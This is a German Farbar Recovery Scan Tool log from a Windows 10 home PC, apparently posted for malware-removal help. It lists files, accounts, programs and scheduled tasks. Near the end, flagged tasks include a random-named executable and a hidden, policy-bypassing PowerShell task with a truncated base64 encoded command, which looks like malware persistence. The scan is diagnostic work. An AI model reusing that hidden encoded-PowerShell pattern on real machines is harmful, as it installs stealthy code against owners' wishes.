2016-04-19 17:12 - 2015-07-29 12:41 - 00001136 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-19 16:16 - 2015-07-29 13:31 - 01790124 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-19 16:16 - 2015-07-10 18:34 - 00771100 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-19 16:16 - 2015-07-10 18:34 - 00153964 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-19 16:16 - 2015-07-10 13:02 - 00000000 ____D C:\WINDOWS\INF
2016-04-19 16:12 - 2015-07-29 12:41 - 00001132 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-19 16:11 - 2016-03-08 16:24 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-04-19 16:11 - 2015-08-01 18:48 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-04-19 16:11 - 2015-07-10 14:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-19 16:11 - 2015-07-10 11:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-19 15:44 - 2015-07-29 16:37 - 00000000 ____D C:\Program Files (x86)\Avira
2016-04-19 15:38 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Battle.net
2016-04-19 14:41 - 2015-07-29 16:36 - 00000000 ____D C:\ProgramData\Package Cache
2016-04-19 12:45 - 2015-07-31 18:06 - 00002306 _____ C:\WINDOWS\System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD}
2016-04-19 12:45 - 2015-07-31 18:05 - 00002306 _____ C:\WINDOWS\System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B}
2016-04-19 12:45 - 2015-07-29 12:41 - 00003648 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-19 12:45 - 2015-07-29 12:41 - 00003424 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-19 12:43 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-19 12:39 - 2015-09-16 17:58 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-19 12:38 - 2015-09-16 17:58 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-19 12:37 - 2015-07-29 14:04 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{72B71363-67D7-4D80-A0FC-60FE645FEBE1}
2016-04-19 12:37 - 2015-07-10 13:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-19 12:34 - 2016-02-02 15:15 - 00000000 ___RD C:\Users\Harun\OneDrive
2016-04-19 12:34 - 2015-07-29 13:30 - 00002429 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-17 16:13 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\rescache
2016-04-16 20:48 - 2015-09-24 15:09 - 00000000 ____D C:\Users\Harun\AppData\Roaming\.minecraft
2016-04-16 18:30 - 2015-07-29 13:28 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-16 18:15 - 2015-09-23 16:25 - 00000000 ____D C:\Users\faruk
2016-04-16 18:15 - 2015-07-29 14:58 - 00000000 ____D C:\Users\aysec
2016-04-16 18:15 - 2015-07-29 13:24 - 00000000 ____D C:\Users\Harun
2016-04-16 18:13 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-16 17:24 - 2016-02-03 10:50 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Audacity
2016-04-16 15:48 - 2015-07-10 12:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-16 12:41 - 2015-07-29 16:33 - 00000000 ____D C:\Users\Harun\AppData\Local\Spotify
2016-04-16 12:41 - 2015-07-29 16:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Spotify
2016-04-15 18:02 - 2015-08-14 19:28 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-15 18:00 - 2015-08-14 19:28 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-15 17:58 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
2016-04-15 16:59 - 2015-07-29 13:28 - 00000000 ____D C:\Users\Harun\AppData\Local\Packages
2016-04-14 01:45 - 2010-11-21 05:27 - 00453280 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-04-11 23:31 - 2016-03-08 16:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-11 23:28 - 2015-08-01 22:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-11 20:21 - 2016-02-27 14:24 - 00000000 ____D C:\Program Files (x86)\Minecraft
2016-04-11 20:21 - 2016-02-02 19:29 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sony
2016-04-11 20:21 - 2015-07-30 19:07 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Skype
2016-04-11 20:21 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-11 13:22 - 2015-10-22 16:22 - 00000000 ____D C:\Users\Harun\AppData\Local\AMD
2016-04-10 22:05 - 2015-08-01 19:13 - 00000000 ____D C:\Program Files (x86)\AMD
2016-04-10 22:05 - 2015-08-01 18:48 - 00000000 ____D C:\Program Files\AMD
2016-04-10 21:58 - 2015-07-10 14:20 - 00234560 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-10 21:56 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-04-10 17:32 - 2015-07-30 15:07 - 00000000 ____D C:\ProgramData\TuneUp Software
2016-04-09 20:13 - 2015-09-29 16:26 - 00000000 ____D C:\Users\Harun\Desktop\Minecraft
2016-04-07 22:37 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Battle.net
2016-04-07 22:37 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-06 20:32 - 2015-07-10 13:06 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-07-10 13:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-05 09:45 - 2015-08-09 07:13 - 07466024 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9108.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00162784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CFC.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00143600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA81C.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 09618784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET84BF.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00130616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CDB.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA80A.tmp
2016-04-05 09:43 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9C84.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 09675944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9635.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 01265208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9F16.tmp
2016-04-05 09:39 - 2015-08-01 18:47 - 00685584 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\SET9CC9.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00451088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET85B6.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00151056 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA82E.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 01285136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET8512.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 00953360 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\SET91F9.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 40135696 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SETA7D7.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 21739024 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SET9BA2.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08929400 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET8401.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08669624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET91B6.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 11735800 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET906A.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 01539560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9D3E.tmp
2016-04-04 06:16 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00152568 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00133528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 09526616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08843208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08585696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 07392480 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00120656 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 11625784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 09583808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01517360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01245416 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2016-04-04 06:09 - 2015-08-01 18:47 - 26345472 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2016-04-04 05:23 - 2015-08-09 07:10 - 40126976 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2016-04-04 05:15 - 2015-08-09 07:10 - 21730304 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2016-04-04 03:57 - 2015-08-09 07:10 - 00442368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2016-04-04 03:33 - 2015-08-09 07:10 - 01276416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00142336 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2016-04-04 03:31 - 2015-08-01 18:47 - 00676864 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2016-04-02 17:01 - 2015-11-21 15:21 - 00000000 ___RD C:\Users\Harun\Desktop\NVU (YAVUZ)
2016-03-30 13:13 - 2015-08-01 22:54 - 00001983 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-03-30 11:10 - 2015-11-07 20:53 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ____D C:\ProgramData\Skype

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-03-30 20:14 - 2016-03-30 20:14 - 0000000 _____ () C:\Users\Harun\AppData\Roaming\dc.ogt
2016-01-12 18:41 - 2016-01-19 16:52 - 0000600 _____ () C:\Users\Harun\AppData\Roaming\winscp.rnd
2016-01-13 15:38 - 2016-01-19 16:53 - 0000600 _____ () C:\Users\Harun\AppData\Local\PUTTY.RND
2015-07-30 15:17 - 2015-07-30 15:17 - 0007605 _____ () C:\Users\Harun\AppData\Local\Resmon.ResmonCfg
2015-07-29 13:50 - 2015-07-29 13:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\aysec\AppData\Local\Temp\avgnt.exe
C:\Users\faruk\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\libeay32.dll
C:\Users\Harun\AppData\Local\Temp\msvcr120.dll
C:\Users\Harun\AppData\Local\Temp\playstv_patch.exe
C:\Users\Harun\AppData\Local\Temp\radeon-crimson-16.3.2-minimalsetup.exe
C:\Users\Harun\AppData\Local\Temp\raptrpatch.exe
C:\Users\Harun\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-19 15:23

==================== Ende von FRST.txt ============================
Addition

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-19 18:01:06)
Gestartet von C:\Users\Harun\Downloads
Windows 10 Pro (X64) (2015-07-29 11:28:54)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2630849102-760198568-3561441068-500 - Administrator - Disabled)
aysec (S-1-5-21-2630849102-760198568-3561441068-1004 - Limited - Enabled) => C:\Users\aysec
DefaultAccount (S-1-5-21-2630849102-760198568-3561441068-503 - Limited - Disabled)
faruk (S-1-5-21-2630849102-760198568-3561441068-1009 - Limited - Disabled) => C:\Users\faruk
Gast (S-1-5-21-2630849102-760198568-3561441068-501 - Limited - Disabled)
Harun (S-1-5-21-2630849102-760198568-3561441068-1000 - Administrator - Enabled) => C:\Users\Harun
HomeGroupUser$ (S-1-5-21-2630849102-760198568-3561441068-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0403.2316.14 - Advanced Micro Devices, Inc.) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.32.2.3320 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.32.5 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.30944 - Electronic Arts)
Battlefield™ Hardline (HKLM-x32\...\{CB4AC3DA-8CC1-4516-86DA-4078B57DB229}) (Version: 1.1.0.5 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Support Solutions Framework (HKLM-x32\...\{B1AD4FFB-DD17-43EC-8C30-B9E71EAD9132}) (Version: 12.2.8.17 - Hewlett-Packard Company)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 41.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 de)) (Version: 41.0.2 - Mozilla)
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PlaysTV (HKLM-x32\...\PlaysTV) (Version: 1.9.2-r111395-release - Plays.tv, LLC)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.994 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version: 5.1.2-r111396-release - Raptr, Inc)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.41.216.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Spotify) (Version: 1.0.25.127.g58007b4c - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Unity Web Player (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Warcraft Public Test (HKLM-x32\...\World of Warcraft Public Test) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2630849102-760198568-3561441068-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - System32\Tasks\ffgogogoBrowserUpdateUA => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {11AE36CB-2A03-4DDC-A890-64628F30C9EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {17A4B275-EE49-4865-B9C9-53C2BB6B071F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard)
Task: {2798CFEA-C567-4F10-8381-056656C30F47} - System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {2CF52B04-7B08-4ACC-A970-6B3FD69FDC4A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {377F221C-47EF-4C4D-93AC-708AC0ABB8B9} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
